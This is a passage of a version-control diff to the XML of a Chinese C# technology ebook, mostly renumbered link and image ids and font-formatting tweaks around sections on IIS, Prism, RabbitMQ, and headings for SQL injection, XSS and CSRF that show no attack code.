+      <w:hyperlink r:id="rId37" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -26947,7 +27651,7 @@
           <w:sz w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId35" w:history="1">
+      <w:hyperlink r:id="rId38" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -27129,6 +27833,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>读写小于</w:t>
       </w:r>
       <w:r>
@@ -27766,7 +28471,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Prism - Brian Lagunas</w:t>
       </w:r>
       <w:r>
@@ -28348,6 +29052,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>.Net Framework</w:t>
       </w:r>
     </w:p>
@@ -28742,7 +29447,6 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>接下来解释下第4点中IIS是依据什么来处理请求的，答案就是请求文件的后缀名，能够处理各种后缀名的应用程序被叫做ISAPI（Internet Server Application Programe Interface，互联网服务器应用程序接口）应用程序，它其实是一个接口，扮演一个代理的角色，映射请求的页面的后缀和与之对应的应用程序。</w:t>
       </w:r>
     </w:p>
@@ -28934,6 +29638,7 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4905375" cy="3552825"/>
@@ -28950,7 +29655,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId36" cstate="print"/>
+                    <a:blip r:embed="rId39" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -29144,6 +29849,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5274310" cy="3905885"/>
@@ -29160,7 +29866,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId37" cstate="print"/>
+                    <a:blip r:embed="rId40" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -29234,7 +29940,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId38" cstate="print"/>
+                    <a:blip r:embed="rId41" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -29305,7 +30011,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId39" cstate="print"/>
+                    <a:blip r:embed="rId42" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -30250,7 +30956,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId40" w:history="1">
+      <w:hyperlink r:id="rId43" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -30308,7 +31014,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId41" w:history="1">
+      <w:hyperlink r:id="rId44" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -30369,7 +31075,7 @@
           <w:tab w:val="left" w:pos="3600"/>
         </w:tabs>
       </w:pPr>
-      <w:hyperlink r:id="rId42" w:history="1">
+      <w:hyperlink r:id="rId45" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -32045,7 +32751,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId43" cstate="print"/>
+                    <a:blip r:embed="rId46" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -32113,7 +32819,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId44" cstate="print"/>
+                    <a:blip r:embed="rId47" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -38997,9 +39703,6 @@
           <w:numId w:val="103"/>
         </w:numPr>
         <w:ind w:left="900"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -39121,6 +39824,16 @@
         </w:tabs>
         <w:outlineLvl w:val="2"/>
         <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Verdana"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Verdana" w:hint="eastAsia"/>
           <w:b/>
           <w:color w:val="0070C0"/>
@@ -39128,25 +39841,12 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:b/>
-          <w:color w:val="0070C0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
         <w:t>SQL注入</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -39191,9 +39891,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -39349,7 +40046,7 @@
         <w:spacing w:line="340" w:lineRule="exact"/>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
           <w:color w:val="000000"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="18"/>
@@ -39364,7 +40061,7 @@
           <w:tab w:val="left" w:pos="1440"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
           <w:b/>
           <w:color w:val="0070C0"/>
           <w:sz w:val="24"/>
@@ -39395,7 +40092,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId45" cstate="print"/>
+                    <a:blip r:embed="rId48" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -39439,7 +40136,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId46" cstate="print"/>
+                    <a:blip r:embed="rId49" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -39463,9 +40160,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>现在我们把</w:t>
@@ -39480,9 +40174,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -39517,13 +40208,12 @@
         <w:jc w:val="left"/>
         <w:rPr>
           <w:rStyle w:val="a6"/>
-          <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="FF0000"/>
           <w:szCs w:val="18"/>
           <w:u w:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId47" w:history="1">
+      <w:hyperlink r:id="rId50" w:history="1">
         <w:r>
           <w:rPr>
             <w:color w:val="FF0000"/>
@@ -39563,7 +40253,6 @@
         <w:pStyle w:val="10"/>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="FF0000"/>
         </w:rPr>
       </w:pPr>
@@ -39589,7 +40278,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId48" cstate="print"/>
+                    <a:blip r:embed="rId51" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -39613,9 +40302,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>当我们输入了以上</w:t>
@@ -39654,9 +40340,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -39685,11 +40368,10 @@
         <w:pStyle w:val="10"/>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="FF0000"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId49" w:history="1">
+      <w:hyperlink r:id="rId52" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -39757,7 +40439,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId50" cstate="print"/>
+                    <a:blip r:embed="rId53" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -39847,7 +40529,6 @@
         <w:pStyle w:val="10"/>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="FF0000"/>
         </w:rPr>
       </w:pPr>
@@ -39855,9 +40536,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>总的来说有以下几点：</w:t>
@@ -40011,7 +40689,7 @@
         <w:pStyle w:val="10"/>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:eastAsia="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
           <w:kern w:val="0"/>
         </w:rPr>
       </w:pPr>
@@ -40057,28 +40735,28 @@
         <w:pStyle w:val="10"/>
         <w:jc w:val="left"/>
         <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:eastAsia="宋体" w:cs="宋体" w:hint="eastAsia"/>
           <w:kern w:val="0"/>
         </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="10"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
-          <w:kern w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:kern w:val="0"/>
-        </w:rPr>
         <w:t>参考资料：</w:t>
       </w:r>
-      <w:hyperlink r:id="rId51" w:history="1">
+      <w:hyperlink r:id="rId54" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -40110,7 +40788,6 @@
         <w:pStyle w:val="10"/>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="FF0000"/>
         </w:rPr>
       </w:pPr>
@@ -40124,6 +40801,16 @@
         </w:tabs>
         <w:outlineLvl w:val="2"/>
         <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Verdana"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Verdana" w:hint="eastAsia"/>
           <w:b/>
           <w:color w:val="0070C0"/>
@@ -40131,7 +40818,8 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>XSS</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Verdana" w:hint="eastAsia"/>
@@ -40141,17 +40829,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>XSS</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:b/>
-          <w:color w:val="0070C0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
         <w:t>注入</w:t>
       </w:r>
     </w:p>
@@ -40159,7 +40836,6 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
@@ -40276,7 +40952,6 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
@@ -40324,7 +40999,6 @@
         <w:pStyle w:val="10"/>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:kern w:val="0"/>
         </w:rPr>
       </w:pPr>
@@ -40461,7 +41135,6 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:kern w:val="0"/>
         </w:rPr>
       </w:pPr>
@@ -40488,7 +41161,6 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:kern w:val="0"/>
         </w:rPr>
       </w:pPr>
@@ -40581,7 +41253,6 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
@@ -40590,7 +41261,6 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
@@ -40735,7 +41405,6 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
@@ -40773,16 +41442,12 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
         </w:rPr>
       </w:pPr>
@@ -40805,7 +41470,6 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="0070C0"/>
           <w:kern w:val="0"/>
         </w:rPr>
@@ -40937,7 +41601,6 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="22"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
@@ -41113,7 +41776,6 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:kern w:val="0"/>
           <w:sz w:val="22"/>
           <w:szCs w:val="21"/>
@@ -41459,16 +42121,12 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="0070C0"/>
           <w:kern w:val="0"/>
         </w:rPr>
@@ -41520,7 +42178,6 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:kern w:val="0"/>
         </w:rPr>
       </w:pPr>
@@ -41815,16 +42472,12 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:color w:val="00B050"/>
         </w:rPr>
@@ -42220,7 +42873,6 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
@@ -42297,7 +42949,6 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
@@ -42306,7 +42957,6 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
@@ -42317,7 +42967,7 @@
         </w:rPr>
         <w:t>参考资料：</w:t>
       </w:r>
-      <w:hyperlink r:id="rId52" w:history="1">
+      <w:hyperlink r:id="rId55" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -42351,9 +43001,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -42370,7 +43017,7 @@
         <w:tab/>
         <w:t xml:space="preserve">   </w:t>
       </w:r>
-      <w:hyperlink r:id="rId53" w:history="1">
+      <w:hyperlink r:id="rId56" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -42416,9 +43063,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -42430,6 +43074,16 @@
         </w:tabs>
         <w:outlineLvl w:val="2"/>
         <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Verdana"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Verdana" w:hint="eastAsia"/>
           <w:b/>
           <w:color w:val="0070C0"/>
@@ -42437,7 +43091,8 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>CSRF</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Verdana" w:hint="eastAsia"/>
@@ -42447,17 +43102,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>CSRF</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:b/>
-          <w:color w:val="0070C0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
         <w:t>注入</w:t>
       </w:r>
     </w:p>
@@ -42466,7 +43110,6 @@
         <w:pStyle w:val="10"/>
         <w:ind w:firstLine="420"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
@@ -42506,7 +43149,6 @@
         <w:pStyle w:val="10"/>
         <w:ind w:firstLine="420"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
@@ -42573,7 +43215,7 @@
           <w:tab w:val="left" w:pos="720"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
           <w:color w:val="333333"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
@@ -42605,7 +43247,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId54" cstate="print"/>
+                    <a:blip r:embed="rId57" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -42633,7 +43275,7 @@
           <w:tab w:val="left" w:pos="720"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
           <w:color w:val="333333"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
@@ -42645,7 +43287,6 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="FF0000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
@@ -42697,7 +43338,6 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="FF0000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
@@ -42707,7 +43347,6 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:sz w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
@@ -42734,7 +43373,6 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
@@ -42774,7 +43412,6 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
@@ -42811,7 +43448,6 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
@@ -42834,7 +43470,6 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
@@ -42857,7 +43492,6 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:sz w:val="28"/>
           <w:szCs w:val="18"/>
@@ -45581,7 +46215,7 @@
         </w:rPr>
         <w:t>3.帕斯卡(</w:t>
       </w:r>
-      <w:hyperlink r:id="rId55" w:tgtFrame="https://baike.baidu.com/item/%E5%B8%95%E6%96%AF%E5%8D%A1%E5%91%BD%E5%90%8D%E6%B3%95/_blank" w:history="1">
+      <w:hyperlink r:id="rId58" w:tgtFrame="https://baike.baidu.com/item/%E5%B8%95%E6%96%AF%E5%8D%A1%E5%91%BD%E5%90%8D%E6%B3%95/_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -49601,7 +50235,7 @@
         </w:rPr>
         <w:t>，网址：</w:t>
       </w:r>
-      <w:hyperlink r:id="rId56" w:tgtFrame="_blank" w:tooltip="http://www.rabbitmq.com/" w:history="1">
+      <w:hyperlink r:id="rId59" w:tgtFrame="_blank" w:tooltip="http://www.rabbitmq.com/" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -51185,7 +51819,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId57" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
+      <w:hyperlink r:id="rId60" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -51401,7 +52035,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId58" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
+      <w:hyperlink r:id="rId61" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -52146,7 +52780,7 @@
         </w:rPr>
         <w:t>好了，访问</w:t>
       </w:r>
-      <w:hyperlink r:id="rId59" w:history="1">
+      <w:hyperlink r:id="rId62" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -64938,6 +65572,7 @@
   <w:style w:type="character" w:default="1" w:styleId="a0">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="a1">
@@ -65600,7 +66235,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{97B6CA9A-0D6A-4516-8045-D1187D994CA0}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{780F2FE4-8514-4DE9-8986-693CC5C14161}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/EBook/C#技术栈.docx
+++ b/EBook/C#技术栈.docx
@@ -4155,440 +4155,1423 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:widowControl/>
+        <w:pStyle w:val="ad"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
